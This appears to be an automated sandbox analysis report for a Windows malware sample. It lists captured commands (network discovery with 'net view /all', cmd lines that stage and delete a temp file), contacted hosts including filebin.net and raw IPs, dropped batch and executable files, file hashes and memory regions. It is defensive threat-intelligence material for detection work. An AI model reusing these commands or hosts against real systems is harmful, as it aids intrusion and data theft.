C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\8D5F.bin1 > C:\Users\Admin\AppData\Local\Temp\8D5F.bin & del C:\Users\Admin\AppData\Local\Temp\8D5F.bin1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 filebin.net udp
NO 185.47.40.36:443 filebin.net tcp
US 8.8.8.8:53 situla.bitbit.net udp
NO 87.238.33.8:443 situla.bitbit.net tcp
NO 185.47.40.36:443 filebin.net tcp
NO 87.238.33.8:443 situla.bitbit.net tcp
NL 104.110.191.140:80 tcp
NL 104.110.191.140:80 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
DE 194.76.226.200:80 194.76.226.200 tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
BE 193.56.146.189:80 193.56.146.189 tcp
US 13.107.42.16:80 config.edge.skype.com tcp
DE 194.76.226.200:80 194.76.226.200 tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bruhad.bat

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\looad.exe

C:\Users\Admin\AppData\Local\Temp\65BC.tmp\65BD.tmp\65BE.bat


memory/228-159-0x00007FFC2C5F0000-0x00007FFC2D0B1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f32267ac1ddb28dbda52672355628ad4
SHA1 17a84af001f273234d147572f9301c69e3078465
SHA256 d02e76fb112f578e455d6eb4fef7904cc1b318f4c554441eac5b68a62ae58bc4
SHA512 a4a05c51b08f252c809daf6dab355fa5e1cecb4236e36eea2837dad78c6705c6b55ba11d433fc197dcb3f3813bcde6b1a4c5d17be414b6462a70564d448a0f81

memory/2956-162-0x00007FFC2C5F0000-0x00007FFC2D0B1000-memory.dmp

memory/2956-161-0x0000016943BE0000-0x0000016943BE2000-memory.dmp

memory/2956-163-0x0000016943BE3000-0x0000016943BE5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ebae80f15e0222ee028db9ee01dc675d
SHA1 d63ff8db2cdae429aa51a95fab5da5ca4d42f6d0
SHA256 5a3372478212f6749d4758ad1726a84c5459a8167a8aada61d8c3186f0183dd1
SHA512 cd0c9507ffe6f295233d10beaf9d198a6bb6a9cbec85a823f3cd33970e979641ddab0cb6fda9ccfe1606187dfd9aa34166decd0c1df3d76b40265b251746c759

memory/2332-165-0x00007FFC2C5F0000-0x00007FFC2D0B1000-memory.dmp

memory/2332-166-0x00000216A6830000-0x00000216A6832000-memory.dmp

memory/2332-167-0x00000216A6833000-0x00000216A6835000-memory.dmp

memory/2332-168-0x00000216A6836000-0x00000216A6838000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\load.exe

MD5 311a1a3e30ebc90b3f4b5d13ec0c8d4d
SHA1 9f0698b5928f227163b1e8bab084d898dfb057ef
SHA256 73c45ca119accbbb3c2abe41823b8dd3c8497c2eab250e7e6f6d64f90c97e2f3
SHA512 f16e3e99f001851ef673d58282b75abba2b0fc7f78998729c44d78fc548cf75d82a4e6de994f700b3131a9f5fbb96660a5cc801cf9d1466a01a02adabb62e7e1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 812dda7d6d35b4447ecd0f3c4fa64d65
SHA1 341984a0301dd235ba2a734e2c5a9142af3ac523
SHA256 7e6fe40ec844c85bf4fb63b1721a2aada592461172fab77de06e7458dc066005
SHA512 eb7fa140853d255d67b27c7cae8a4e058c8898621ebb5c9efad2e36246bcc2fcb7c72baadba0c0aaa962301a1e2bdc37c5a7dc6360312d27f7a218a79d0edd29

memory/1524-174-0x000001DA56E40000-0x000001DA56E42000-memory.dmp

memory/1524-173-0x000001DA3DC70000-0x000001DA3E731000-memory.dmp

memory/1524-175-0x000001DA56E43000-0x000001DA56E45000-memory.dmp

memory/1524-176-0x000001DA56E46000-0x000001DA56E48000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\x3inmo35\x3inmo35.cmdline

MD5 169801fbea3f3f1dd92c83b4256ced12
SHA1 4d8ff1999c4f6245b7de6c8e6f6fb680aa61a7a2
SHA256 8e750a9f17192269605c4dedb2f00e523ef4eb0520bb69753f533ec7cb4dd56a
SHA512 c6945bd76cf72c02eb517adba3970ae17ab71e675cd3b7663658c787e0d4f34a097e522fe144b89484942c7cce7f4caa74a4356436f72b76c61727f3d8fc9e6d

\??\c:\Users\Admin\AppData\Local\Temp\x3inmo35\x3inmo35.0.cs

MD5 0b7537cf8128ca1320d7bf219bb65b46
SHA1 33ca68f06067df84baa078137f1285102d30cb3a
SHA256 42fffdc792c601ba88907615926489b19aec09d687260f8d9a7955650a7756a8
SHA512 3cdc646a28f237b5607aedd68eb11d3f819b3e71773b7bc6294c7e8c985a821049f0a29be9a5eaf6d688df068eea38a749a87b461454ed311e636008c670b276

\??\c:\Users\Admin\AppData\Local\Temp\x3inmo35\CSCAD89A661A4034B56BD98BEBDC6FA94CA.TMP

MD5 adc5f533310c2aa57300736bf05b1216
SHA1 7c9a51a19750c744cb66aad6cea3bac9d542c73b
SHA256 6b76cdbed2616598d34aae6a40833a07a0bcd5a704d83f433ea4e33912b80887
SHA512 d1040fbfaadab4fc36713e671168d4b8740aad83ddbd6ad91829e66a311a7870fde35bb057861edc40e84c1257029e4f2c10c1defb949590029dfc405481ca95

C:\Users\Admin\AppData\Local\Temp\RES2572.tmp

MD5 a17ed0081010726dbe597a8a56dfe2e0
SHA1 a9bfdac9b30155d277c0225aacd5aa77081220a5
SHA256 727569397ac9cbe116c6fa4a7f9523e2b8dd925c6d4de475d6a44a7d6ed75439
SHA512 c80328d5e7b902ea3fffdedf781c34742b1b02f863cd52ea2aa29093fcaa03b4047f18422e30eb91e0d8ddbc7f0a4868465e2fff82ec6416da26828702972aee

C:\Users\Admin\AppData\Local\Temp\x3inmo35\x3inmo35.dll

MD5 9fecd05eea5ae5e90a981da4ae438d6d
SHA1 0240a82999911006d9ba17f54a99941d6d4fdeb0
SHA256 1abef0ba453418e2b76425396391163bdb8440b1d1a82609218dbee42a753ce9
SHA512 922f997bba8fa18e34d456f7f326cfbc5b89814e781f2d98ae6b8dd5187ba27b6cc02ce03125607f538e84e9cc33c4eebb298027083fb784e74bc9741aa11c8e

\??\c:\Users\Admin\AppData\Local\Temp\3kgaxgp0\3kgaxgp0.cmdline

MD5 eac4de7980c902bb547d4a666865a39f
SHA1 ddc44cb5915ece707247592740533175a479f3ab
SHA256 4173cb88b2ed91cfec219c41dce852590112cac5c5c4bb1882527d54157793a9
SHA512 7f9bb0eaa519d35290667c55830b67a2318b140d92dfbe9a5854889d203b4803820d94073e9212563a2c4cc96e42c1fba700c630c3567503e0605404d766ab65

\??\c:\Users\Admin\AppData\Local\Temp\3kgaxgp0\3kgaxgp0.0.cs

MD5 35b3f48ba529849ae98e5f2c89b802f6
SHA1 e6ac7f0dff73e320ab7c09f5abb45dede87cfe81
SHA256 f8708957c3c4032d98bcdb50008ff132f1cef7b839521dc4ab9c22ba91a3bb61
SHA512 b6559f6f80520c9a29b1534022483cf2fcae200cac9c4c640cc2db9a7a1588122480f84561f858789067916e455aea57e45b346edb93dcd4a966b2ee4be7e153

\??\c:\Users\Admin\AppData\Local\Temp\3kgaxgp0\CSC6E24615EF38442F7BFB7EE57DB209138.TMP

MD5 1e5b8320a66f872ed65c9a6b2c097ce0
SHA1 d228fdc8c010b020eabd1c352bde3cde1852a0f8
SHA256 e6dfdc33f6613ed24ab46ebc844e3893eff215428b2fc1e71c7530ab92648cec
SHA512 2d69a7029419712a9d4409e75866138f3f22b67b0d5f61e1756ebc42e94c01d6c422ab0aa4f63cd55cc19eda88fc7b67dd3bf9b2bb812eb034a339e1417883d4

C:\Users\Admin\AppData\Local\Temp\RES268C.tmp

MD5 eba677b8f5603b05fa6450df7bdcde14
SHA1 c5745a30b32b470a470ef3da65f8c3a1d08d5a8c
SHA256 f9dd00e1f86f1bfa866ea22458da779ecbbe445f6b4b2488682c2e8ec2637fb5
SHA512 bcfc905127f906bfc33b0b43b532b0da0d7977a2c048e9f7e750ec1f35b80fd60b8367f04c84e96f7f93773483ca3492a38661d4d84d1b773acfdbd5db5cfe69

C:\Users\Admin\AppData\Local\Temp\3kgaxgp0\3kgaxgp0.dll

MD5 3543b3933defc044b183bc7d04d2c0c6
SHA1 465e7b844e635f6dbaf3bd2b37a6439f3880e01a
SHA256 dc534aa636ccbe457d4321784b2ecd6104afe165515eba6fc262cf37496ee2bc
SHA512 f7bc5c0ee8e16a13534e70f95b2ce96f3bbf83038757a40e525dc0c7c229dbab77528ca3d7c5cf706259ec9f18bc101cc8355413bffd339fc34b4c45778c3da4

memory/1524-187-0x000001DA56D80000-0x000001DA56DC4000-memory.dmp

memory/2688-189-0x00000000013B0000-0x00000000013B1000-memory.dmp

memory/3544-188-0x00000137F97C0000-0x00000137F97C1000-memory.dmp

memory/2688-190-0x00000000084A0000-0x0000000008558000-memory.dmp

memory/3544-191-0x00000137F9700000-0x00000137F97B8000-memory.dmp

memory/2296-192-0x000001CA81470000-0x000001CA81471000-memory.dmp

memory/2296-193-0x000001CA815A0000-0x000001CA81658000-memory.dmp

memory/3840-194-0x000001DF9EDD0000-0x000001DF9EDD1000-memory.dmp

memory/3840-195-0x000001DFA1600000-0x000001DFA16B8000-memory.dmp

memory/2584-196-0x000002B90CC30000-0x000002B90CC31000-memory.dmp

memory/2584-197-0x000002B90CE90000-0x000002B90CF48000-memory.dmp

memory/3272-198-0x000001F48EBD0000-0x000001F48EBD1000-memory.dmp

memory/3272-199-0x000001F490F80000-0x000001F491038000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EE19.bi1

MD5 4f6429322fdfd711b81d8824b25fcd9c
SHA1 f7f917b64dd43b620bacd21f134d430d3c406aec
SHA256 d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8
SHA512 e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

memory/1912-202-0x0000000000DB6B20-0x0000000000DB6B24-memory.dmp

memory/1912-203-0x0000000000AB0000-0x0000000000B5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 7322e96310d913e42d509afee16d3097
SHA1 17b89a7fb3a7a8809d86cbb15765f11cfdb788a5
SHA256 9b1b14e8ab1c95819e2d79149e5d756839daf79a642c550230096b2cfc2bb5fa
SHA512 1ad68f6d8a09d21ceadbbdaadfe0a5679b1d0d10d4a4dc1b911a94740a29c5408457f013db4d84d9fb6cd9b094a84644f6989ed3a09f8339d5570eb43e046708

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 ce1caed8505e68ea711adf888c60c96a
SHA1 277f9f42b28442f26adb68650618f2d6720eb855
SHA256 f9aa3fb82f01f81147d391c70e783d7332bd23bfa0cc44d7afd0e296b36ccd9a
SHA512 8ec79e56848014b80ab573ee579b804205cd1b3e4437a6a723e04625c5d040f3bb2972bfc934a05ae7630de14bf29fae83ef68401cd5b61768bc26e5a4af553d

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 794371850a4abe0e055d720dc804d357
SHA1 4a332ec27920133052b0e2363346be373dbc27de
SHA256 ce51282d866922a36f6007e97a4e6c5a7d4922fd41d4eb9b0f8ba1c87ef77240
SHA512 c8cbe67c60e1cd8cc61f16f68273d5d818dc09ddf8cc3a8269f13a0f51ce5f6792ebef3759f69e5bc48a1e84424cf289cae9e097ca84bf1db341e588841ed785

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 2ad31e08cf6878b73edf936bfb365db1
SHA1 20153c2a8bcae33f6acb92d419654d3b520bc6c0
SHA256 fdb39459cfeb1a2c6a392f9615395ed964cc04ed91b8a1ae38945bec8dbd1afc
SHA512 62d88524f17c57bc6d9307772b759b70d8a6aeab0fc4e2f9a275ad71ac3d97e341beae40c9ebc8c62efb3f86f14bdc0e88bf1f653c42fc3682c0a3d3fbf238cc

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 7a89e257311605168c3d48957527cc51
SHA1 07e956d80648d99736c0c64e5e015e757b5488fc
SHA256 efd29394fb77576087dfbfaf54ca6a1ddf9316d260c801f9c507a0038887f5d8
SHA512 571309b5b29313f41cc5d466ef0ba119d273dfac99c8df3c415f022b653b00f1caef1a40426ed20cd5401cdbb3c62dadf7dc729f10d3f3f28ced42ac4ff0efae

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 935514ad22ed381318a87e486ef5bc78
SHA1 fd4886fa37ff06ebc79db32b19321312bcc4186f
SHA256 b3835c92ef4c9727100f1abd83de6ceb5415185e03cc2b648a5a19318acfcd8c
SHA512 54f9f8cbb5f08de6a8bb67a2a00d068e52fd1fb03c5076215f40c17ff0cb6605f1aee8daab9e764d4ff29ced55db46216abee272f155f5245faf98e469faf0de

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 d4192db41d354e74aae7dc017173aa4b
SHA1 7a55aa314280d0ca59f6481723436e347830ca72
SHA256 13be7e1c50702ccb92eb3f0c1c1349333205f5ec04ba73d075982add9a859d62
SHA512 bd457b2dd78594c0a8b5ef5d71f7695758f458396718fae8f0ec38b7f44b7bd5f1e81d6aa5632be485ca3a79b40fa2389579b2a39d8b6849b3348f9a8b9d8b6a

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 e80eac80c1d472714cf5298a0f230e97
SHA1 4b4ad416755fa50dc057b4b4f9301c32120a8347
SHA256 061129b0245203345de18c066c8e7337e1aff9933b1e24b8216030881da6e9c5
SHA512 2b6633df4cbac1332f2b4e85d09cce4d4cee46df661ee6f3ba7eec3af42d98e46a5bf6f1db3300dbcfb4a01abd126d923fb4146190f3763f5e1c01b739931dd6

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 d28756006cbd8a04fdf9a0f195103051
SHA1 03e1895c13182bb78d167322ba823e5ff497bf34
SHA256 f048be6e5dbd3a9314539f677d29ba87c344b8ad9fb35938deac8c5e740099f8
SHA512 fa707b87a8ac7f8c836b5861d10153becd5cef9773c67c12eb33890e519657cc319070d62885bc8be154739491c450126422eaecfa45d79aaac0cd7dd313a137

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 a972831687d699f62a6f7995f7d4b184
SHA1 d6e77451e5ee30f8b9b629a16f463d24a5fb164c
SHA256 6d9018088924ab5fbec13bea8515891cf286a5bcdc0642334a65b777efae0237
SHA512 8fb4273854777428be4fb2551bcc872d366ad2bd3cd8dfcfecd122f972f662b808abe0824273205e91006e1cb3064687677615b5c6f5cb81540ea5e5b893a9e4

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 3ab03194b43e646841f0d508c0a4b5f7
SHA1 51276ec39e3fb3c4b84fb01432b4f8e3274966d9
SHA256 74591a2e6cc6e5ae5b2c110349e5a5f7face29455ddeb709285001c8184aa55a
SHA512 43d3c440edefcef3e39f8d9a9b5b01112c0e196651d3af21c2753f4e7415c416f60d5d8c34a6fab0e983c3ade902da3d066143efe75d575e4feb0f63f62a278c

C:\Users\Admin\AppData\Local\Temp\8D5F.bin1

MD5 9d8c0c68a4ed71e1b94d60d0d8ea2494
SHA1 6923b6e894e705c57a327e923658cb8f2b41ff4c
SHA256 7fbfd844c157c340926c75279e5cebc4e019ba7e55b2d2575b529ed2ca69284f
SHA512 dffd5da079255496865193664dc2504c42c32fe27751fc9df396fd3b107ba0d44e673c41dc4645e5fd9f7f86f4a037eee1cbf7b9c131f3bcd9ff550568abe0ad

C:\Users\Admin\AppData\Local\Temp\8D5F.bin

MD5 9d8c0c68a4ed71e1b94d60d0d8ea2494
SHA1 6923b6e894e705c57a327e923658cb8f2b41ff4c
SHA256 7fbfd844c157c340926c75279e5cebc4e019ba7e55b2d2575b529ed2ca69284f
SHA512 dffd5da079255496865193664dc2504c42c32fe27751fc9df396fd3b107ba0d44e673c41dc4645e5fd9f7f86f4a037eee1cbf7b9c131f3bcd9ff550568abe0ad